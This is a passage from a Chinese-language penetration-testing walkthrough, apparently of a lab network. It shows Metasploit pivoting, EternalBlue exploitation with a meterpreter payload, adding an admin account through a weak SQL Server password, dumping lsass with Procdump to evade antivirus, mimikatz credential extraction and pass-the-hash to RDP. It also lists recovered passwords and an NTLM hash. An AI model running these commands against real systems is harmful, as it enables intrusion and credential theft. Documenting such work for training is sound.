![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/aa98b103a4cc8390c4935681b0f668ef.png)
使用getuid和sysinfo查看一下信息
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/f3fba136c052b53379f810d93ea063d2.png)

使用`backgroud`回到界面
使用模块，来添加路由
`use post/multi/manage/autorout`
`set session 2`
`exploit`
只有在添加路由后，才可以借助当前设备作为跳板来对其他服务器进行漏洞扫描了
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/ce9e8b91e269ae9ca6e3cdf5f8402241.png)
## 目标一：10.35.203.227 永恒之蓝
扫描ms17_010漏洞
`use auxiliary/scanner/smb/smb_ms17_010`
`set rhosts 10.35.203.227`
`run`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/cbadf2d3fec3fc4dffec4e53b6f53757.png)
可以看到存在漏洞
`use auxiliary/admin/smb/ms17_010_command`
`set rhost 10.35.203.227`
`set command whoami`
`run`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7ae8a2440c4ce23e51ba67867cf98a9e.png)
成功获取权限
使用以下命令进行正向连接
`use exploit/windows/smb/ms17_010_psexec`
`set payload windows/meterpreter/bind_tcp`
`set rhost 10.35.203.227`
`run`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b7ed1372e37a4bdcd945add60c10c0a0.png)
回显出hash，解密得到Administrator/ma5680t
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/9179f6ca19b928d1113aa9119e9af166.png)
通过`run post/windows/manage/enable_rdp`命令开启目标3389端口
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/6d3f053af75878d3c60ece9f45259e63.png)
远程连接成功
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/fc1b250d8345c703f32452da48a0deb0.png)


## 目标二：10.35.203.216 数据库弱口令
10.35.203.216 sa/P@ssw0rd
使用数据库利用工具添加用户
`clr_badpotato net user test Pass0822.. /add`
`clr_badpotato net localgroup Administrators test /add`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0acaf8652cd2f7b16cfc8fd825a8fd6a.png)
test/Pass0822..
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/3a962888a213bdf60b03ee5d09ef5e33.png)
tasklist 可以看到目标有360
mimikatz上传既被杀，Procdump没被杀
考虑通过Procdump+Mimikatz离线读取lsass.dmp文件
> **Procdump是微软官方发布的工具，所以杀软不会拦截，其可以用来将目标lsass文件导出。下载地址：**[**https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump**](https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump)

**先用在目标机器上传微软的工具Procdump，导出其lsass.exe：**
```abap
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
```
将在目标机器上导出的lsass.dmp下载到本地后，执行mimikatz导出lsass.dmp里面的密码和hash：
```abap
sekurlsa::minidump 目录\lsass.dmp       // 将导出的lsass.dmp载入到mimikatz中
sekurlsa::logonpasswords full                 // 获取密码
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/04d1517ef18a5d26e4953c79d3260aa6.png)
目标hash如下
`3956bb5c470fafdb53f61810e3e6020d`
Cmd5解不出来，尝试使用hash传递
```abap
privilege::debug
sekurlsa::pth /user:administrator /domain:10.35.203.216:13389 /ntlm:3956bb5c470fafdb53f61810e3e6020d "/run:mstsc.exe /restrictedadmin"
```
遇到了以下麻烦
![1474079-20180828124253643-1758643131.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7cad7f8aa845efc910c62c08a9b8edeb.png)
修改本地计算机下面配置后成功连接目标
` gpedit.msc `计算机配置>管理模板>系统>凭据分配>加密Oracle修正  
![1474079-20180828124528127-1089319304.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/609b1dfb5925ce78179f013bfb710be7.png)
成功连接
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/91d2ddbb0998faf1e9205baddab0f0a4.png)

![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7ac9334a8e76bd36e3bf4728afc3509a.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/32845aee48efbf01c4e7b139801f44f2.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/651be4450eecccb33605ce5c53a70ccb.png)